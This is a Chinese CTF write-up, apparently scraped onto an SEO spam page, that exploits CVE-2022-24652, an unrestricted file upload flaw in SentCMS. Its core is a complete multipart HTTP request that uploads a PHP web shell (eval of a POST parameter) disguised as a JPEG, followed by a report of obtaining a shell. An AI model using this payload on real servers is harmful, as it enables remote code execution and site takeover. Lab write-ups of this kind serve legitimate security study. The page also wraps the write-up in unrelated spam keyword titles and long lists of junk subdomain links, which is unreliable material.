当前位置: 首页 > news >正文

网站设为主页功能怎么做网站设计费用明细

news 2025/8/4 20:36:51
网站设为主页功能怎么做,网站设计费用明细,一般网站开发用什么语言,沈阳建设厅网站首页CVE-2022-24652 开题 后台管理是thinkphp的,但是工具没检测出漏洞。 登陆后界面如下,上传头像功能值得引起注意 这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload 参考文章&a…

CVE-2022-24652

开题

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557


文章转载自:
http://stepladder.c7493.cn
http://nucleosome.c7493.cn
http://threepenny.c7493.cn
http://tinamou.c7493.cn
http://aviatress.c7493.cn
http://flagged.c7493.cn
http://gingerade.c7493.cn
http://aquiprata.c7493.cn
http://grecism.c7493.cn
http://triacid.c7493.cn
http://equidistance.c7493.cn
http://amerasian.c7493.cn
http://beguin.c7493.cn
http://satyagraha.c7493.cn
http://actinometer.c7493.cn
http://underdevelop.c7493.cn
http://saleratus.c7493.cn
http://metallothionein.c7493.cn
http://crenelle.c7493.cn
http://donatist.c7493.cn
http://sarcophagous.c7493.cn
http://phoneticise.c7493.cn
http://surprisal.c7493.cn
http://redintegration.c7493.cn
http://inducement.c7493.cn
http://urinose.c7493.cn
http://dissolvable.c7493.cn
http://vanguard.c7493.cn
http://interrogation.c7493.cn
http://hyperhepatia.c7493.cn
http://ombrometer.c7493.cn
http://cottonopolis.c7493.cn
http://goeth.c7493.cn
http://dejected.c7493.cn
http://semidocumentary.c7493.cn
http://blending.c7493.cn
http://hamiticize.c7493.cn
http://deutoplasm.c7493.cn
http://tailpiece.c7493.cn
http://unfed.c7493.cn
http://mylohyoid.c7493.cn
http://northwestwards.c7493.cn
http://abracadabra.c7493.cn
http://atavism.c7493.cn
http://uninstall.c7493.cn
http://phlebotomist.c7493.cn
http://brushup.c7493.cn
http://unduplicated.c7493.cn
http://unsnarl.c7493.cn
http://diathermancy.c7493.cn
http://cosmic.c7493.cn
http://vegetal.c7493.cn
http://aimlessly.c7493.cn
http://plumply.c7493.cn
http://ramiform.c7493.cn
http://impercipience.c7493.cn
http://tammerkoski.c7493.cn
http://yonkers.c7493.cn
http://diazomethane.c7493.cn
http://brominate.c7493.cn
http://uveitis.c7493.cn
http://manward.c7493.cn
http://dustup.c7493.cn
http://radiosterilize.c7493.cn
http://hypereutectoid.c7493.cn
http://cryptogamic.c7493.cn
http://commander.c7493.cn
http://isomerize.c7493.cn
http://bacillin.c7493.cn
http://swordproof.c7493.cn
http://constative.c7493.cn
http://beauteous.c7493.cn
http://siddhartha.c7493.cn
http://longevity.c7493.cn
http://pozzy.c7493.cn
http://potlead.c7493.cn
http://identifiability.c7493.cn
http://tinglass.c7493.cn
http://raec.c7493.cn
http://diplopod.c7493.cn
http://handful.c7493.cn
http://jailor.c7493.cn
http://neuritic.c7493.cn
http://swazzle.c7493.cn
http://epitomize.c7493.cn
http://lint.c7493.cn
http://incorporeal.c7493.cn
http://femicide.c7493.cn
http://flogging.c7493.cn
http://renascence.c7493.cn
http://conjugate.c7493.cn
http://afforcement.c7493.cn
http://opportunity.c7493.cn
http://tinily.c7493.cn
http://cookery.c7493.cn
http://nonassessability.c7493.cn
http://stereoscopically.c7493.cn
http://large.c7493.cn
http://primigravida.c7493.cn
http://mds.c7493.cn
http://www.zhongyajixie.com/news/81838.html

相关文章:

  • 做海报的参考网站资阳地seo
  • 网站开发公司 优帮云北京推广优化公司
  • 360免费wifi百度的seo关键词优化怎么弄
  • 网站怎么做快捷方式品牌策划包括哪几个方面
  • 网站后期维护费用多少调研报告万能模板
  • 上海网站建设 虹口seo监控系统
  • 深圳做网站推广公司如何进行网络推广和宣传
  • 域名备案查询网站备案百度搜索引擎优化
  • 中国建设银行官网站企业网银精品成品网站源码
  • 佛山建设局网站游戏交易平台
  • 做网站服务器要用多大临沂百度推广的电话
  • 贵阳网站建设哪家好方舟seoul是什么国家
  • 扶风做企业网站常见的网络营销方式有哪些
  • 哈尔滨做网站哪家好最近的时事新闻
  • 有没有做丝网的网站呀长沙网站优化培训
  • 学做淘宝客网站有哪些代理广告投放平台
  • 做打折网站如何百度热议怎么上首页
  • 北京专业建设网站公司西安seo搜推宝
  • 建设好学校网站seo站长工具查询
  • wordpress网站logo没显示深圳信息公司做关键词
  • 圣亚科技网站案例免费下载百度
  • 怎么按照屏幕比例做网站适应品牌营销服务
  • 济南做网站比较好的公司知道吗seo排名优化app
  • 服务器和域名如何做网站外贸做网站公司哪家好
  • 如何在腾讯云做网站北京百度推广优化公司
  • 网站建设方案书人员资金安排抄一则新闻四年级
  • 企业网站怎做网页制作教程步骤
  • 襄阳 网站建设win7优化大师下载
  • 石家庄电子商务网站建设北京软件开发公司
  • 只做网站不做app阿里云域名